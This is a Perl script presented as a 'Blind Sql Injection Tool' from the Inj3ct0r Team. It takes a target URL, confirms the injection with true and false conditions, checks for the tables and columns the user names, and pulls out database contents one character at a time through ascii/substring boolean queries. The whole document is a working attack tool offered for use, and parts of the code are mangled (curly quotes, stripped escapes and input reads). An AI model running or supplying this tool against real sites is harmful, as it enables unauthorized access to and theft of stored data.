[cc lang=”perl”]#!/usr/bin/perl
use LWP::Simple;
use Time::HiRes qw(gettimeofday);
###############################################################

$string=”;
$limit=0;

#string variable###############################################
# if the string that you want to use is not writable #
# on the shell you can write in this variable and #
# whene the script order from you the variable just #
# press enter. #
###############################################################

#limit variable##############################################
# if you want a particular column just change this #
# variable. #
#############################################################

@ascii_sym = (32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,58,59,60,61,62,63,64,91,92,93,94,95,96,123,124,125,126);
$glob_stat;

print “nt===============================================*n”;
print “t* Blind Sql Injection Tool *n”;
print “t* Coded By Angel Injection *n”;
print “t* Member From Inj3ct0r Team *n”;
print “t* Thanks To:r0073r,Sid3^effects,r4dc0re,CrosS, *n”;
print “t===============================================*nn”;

print “Stage 1:Checking if the target is vulnerablenn”;
print “You should now enter the infected urln”;
print “Example :http://www.localhost/index.php?id=1nn”;
print “URL: “;
my $url = ;
chomp($url);
$now = time_mili();
my $yes = get(“$url+and+1=1”);
$later = time_mili();
$exect = $later – $now;
$exect = sprintf(“%.2f”, $exect);
my $no = get(“$url+and+1=0”);
def($yes,$no);
print “Stage 2 :[*] Checking For A String That Can lead To exploit The Target[*]nn”;
print ” You should now enter a string(from shell or source code)n”;
print ” and wait to see if is a good one. Your string must be n”;
print ” related to the targetnn”;
print ” The string must exist on the true page or the false page n”;
print ” but not on both of them.n”;
print ” A file has been created under the name string.txt it may helpn”;
print ” you to choose your stringnn”;

if($string eq ”){
print “String: “;
$string = ;
chomp($string);
while(strc($yes,$no)!=1){
print “String: “;
$string = ;
chomp($string);
}
}
else{
if(strc($yes,$no)!=1){
print “Please Choose another onen: “;
exit;
}
}
chomp($string);
print “n => Nice choicenn”;

print “Stage 3 :[*] Extracting Information From Database[*]nn”;
print ” You should now enter The Table namen”;
print ” and number of Columns to be extractedn”;
print ” and their names and condition on this columnsn”;
print ” if you want itnn”;

print “Table Name : “;
my $tbname = ;
chomp($tbname);
print “Columns Number : “;
my $num = ;
chomp($num);
if($num =~ /^[+-]?d+$/){
chomp($num);
}
else{
while($num !~ /^[+-]?d+$/){
print “Columns Number : “;
$num = ;
chomp($num);
}
}
chomp($num);
my @column,@trcolmun,@numtr,@result;
for(my $q=0;$q<$num;$q++){ print "Columns Name : "; $column[$q] = ;
chomp($column[$q]);
}

print “n Do You have any condition on your informationn”;
print ” Exemple: where id=1nn”;
print “(yes/no): “;
my $condt = ;
chomp($condt);
if($condt eq ‘yes’){
print “nEnter Condition: “;
$condition=;
chomp($condition);
}
print “nStage 3-1 :[*] Checking table and columns[*]nn”;
print ” Nothing That You Can do it nown”;
print ” just let the script do his jobnn”;
my $pr=chvar(“$url+and+(SELECT 1 from $tbname limit 0,1)=1″);
if($pr==1){
print ” => Table Existen”;
}
else{
print ” => Table Dosn’t Existe”;
exit;
}
my $j=0;
for(my $q=0;$q<$num;$q++){ $pr = chvar("$url+and+(SELECT substring(concat(1,$column[$q]),1,1) from $tbname limit 0,1)=1"); if($pr==1){ $trcolumn[$j] = $column[$q]; print " => Column $column[$q] Existen”;
$j++;
}
else{
print ” => Column $column[$q] Dosn’t Existen”;
}
}
$trco = @trcolumn;
if($trco==0){
print “n => No Columns Foundn”;
exit;
}

print “nStage 3-2 :[*] Extracting Columns length[*]nn”;
print ” The Script is going now to get eachn”;
print ” columns lengthn”;
print “nCounting length of Columns…nn”;
for(my $q=0;$q<$j;$q++){ my $qj=0; my $ii=1; while($qj==0){ $pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58"); if($pr==1){ $ii++; $pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58"); if($pr==1){ $qj=1; } else{ $ii-- } } $ii++; } $ii -=3; $numtr[$q]=$ii; print " => $trcolumn[$q] : $iin”;
}
for(my $rul=0;$rul<$trco;$rul++){ $result[$rul]=''; } $gtf=0; ($second, $minute, $hour) = localtime(); print "nExtracting information ...nn"; print "Guessing time for each column(in seconds)nn"; for(my $idn=0;$idn<$trco;$idn++){ $max = $numtr[$idn] * $exect * 8; $max=sprintf("%.2f", $max); $gtf+=$max; print " #=> $trcolumn[$idn] max time of extraction = $maxn”;
}
print “nStart at $hour:$minute:$second (expected time to finish (in seconds) : $gtf)nn”;
$now1 = time_mili();
for(my $bn=0;$bn<$trco;$bn++){ $nowt = time_mili(); for(my $bnum=1;$bnum<=$numtr[$bn];$bnum++){ my $ascii=opt("$url+and+ascii(substring((select concat($trcolumn[$bn],0x3a)+from+$tbname $condition limit+$limit,1),$bnum,1))"); $result[$bn].=pack("c",$ascii); } $latert = time_mili(); $realt = $latert - $nowt; $realt=sprintf("%.2f", $realt); print " => $trcolumn[$bn] = [$result[$bn]] (real time = $realt)n”;
}
$later1 = time_mili();
$exect1 = $later1 – $now1;
$exect1 = sprintf(“%.2f”, $exect1);
($second, $minute, $hour) = localtime() ;
print “nFinish at $hour:$minute:$second (elapsed time (in seconds) : $exect1) nn”;

sub opt{
my $url=$_[0];
my $isnum = $url;
my $sym_st;
$isnum .= “>57”;
my $isalpha = $url;
$isalpha .= “>96”;
my $isAlpha = $url;
$isAlpha .= “>65″;
my $rt=”;
my $brp = chvar($isnum);
if($brp==1){
my $brp1 = chvar($isalpha);
if($brp1==1){
$rt = brute_alpha($url,97,103,110,115,122);
$sym_st=3;
}
else{
$rt = brute_alpha($url,65,71,78,83,90);
$sym_st=2;
}
}
else{
$rt = brute_num($url);
$sym_st=1;
}

if(ord($rt) == 0){
$rt = opt_sym($url,$sym_st);
}
return $rt;
}

sub opt_sym(){
my $url = $_[0];
my $rt=”;
if($_[1]==1){
my $ft = $url;
$ft .= “>40”;
my $rft = chvar($ft);
if($rft==1){
$rt = brute_sym($url,8,15);
}
else{
$rt = brute_sym($url,0,7);
}
}
else{
if($_[1]==2){
$rt=brute_sym($url,16,22);
}
else{
$rt=brute_sym($url,23,32);
}
}
return $rt;
}

sub reduse{
for(my $i=$_[0];$i<=$_[1];$i++){ my $tmp = $_[2]; $tmp .="=$i"; my $qq = chvar($tmp); if($qq==1){ return $i; last; } } } sub brute_sym(){ my $ek; for(my $i=$_[1];$i<=$_[2];$i++){ my $tmp = $_[0]; $tmp .="=$ascii_sym[$i]"; my $qq = chvar($tmp); if($qq==1){ $ek=$i; last; } } return $ascii_sym[$ek]; } sub brute_num(){ my $url = $_[0]; my $ft = $url; my $rt=''; $ft .= ">52″;
my $mrp = chvar($ft);
if($mrp==1){
$rt = reduse(53,57,$url);
}
else{
$rt = reduse(48,52,$url);
}
return $rt;
}

sub brute_alpha(){
my $url = $_[0];
my $ft = $url;
my $sd = $url;
my $td = $url;
my $rt =”;
$ft .= “>$_[2]”;
$sd .= “>$_[3]”;
$td .= “>$_[4]”;
my $mrp = chvar($ft);
if($mrp==1){
my $mrp1 = chvar($sd);
if($mrp1==1){
my $mrp2=chvar($td);
if($mrp2==1){
$rt = reduse(($_[4]+1),$_[5],$url);
}
else{
$rt = reduse(($_[3]+1),$_[4],$url);
}
}
else{
$rt = reduse(($_[2]+1),$_[3],$url);
}
}
else{
$rt = reduse($_[1],$_[2],$url);
}
return $rt;
}

sub strc{
my $tmp=0;
if(($_[0] =~ /$string/) && ($_[1] !~ /$string/)){
$glob_stat=1;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] !~ /$string/)){
$glob_stat=0;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] =~ /$string/)){
return 0;
}
}

sub def{
my @fi = split(//,$_[0]);
my @sd = split(//,$_[1]);
my $rt=”;
my $cn = @fi;
my $cn1 = @sd;
my $k;
($cn>$cn1) ? $k=$cn : $k=$cn1;
my $i,$j=0;
for($i=0;$i<$k;$i++){ if($fi[$i] ne $sd[$i]){ $rt.=$fi[$i]; $j++; } } if(($j>5) && ($j<($i-300))){ print "n => Target Maybe Vulnerablenn”;
open(MYFILE,’>string.txt’);
print MYFILE $rt;
close(MYFILE);
}
else{
print “n => Target Not Vulnerablenn”;
exit;
}
}

sub chvar{
my $url=$_[0];
my $tmp = get($url);
if($tmp=~/$string/){
if($glob_stat==1){
return 1;
}
elsif($glob_stat==0){
return 0;
}
}
elsif($tmp!~/$string/){
if($glob_stat==1){
return 0;
}
elsif($glob_stat==0){
return 1;
}
}
}

sub time_mili(){
my $s,$m,$r;
($s,$m) = gettimeofday();
$r = “$s.$m”;
$r +=0;
my $rt = sprintf(“%.3f”, $r);
$rt +=0;
return $rt;
}[/cc]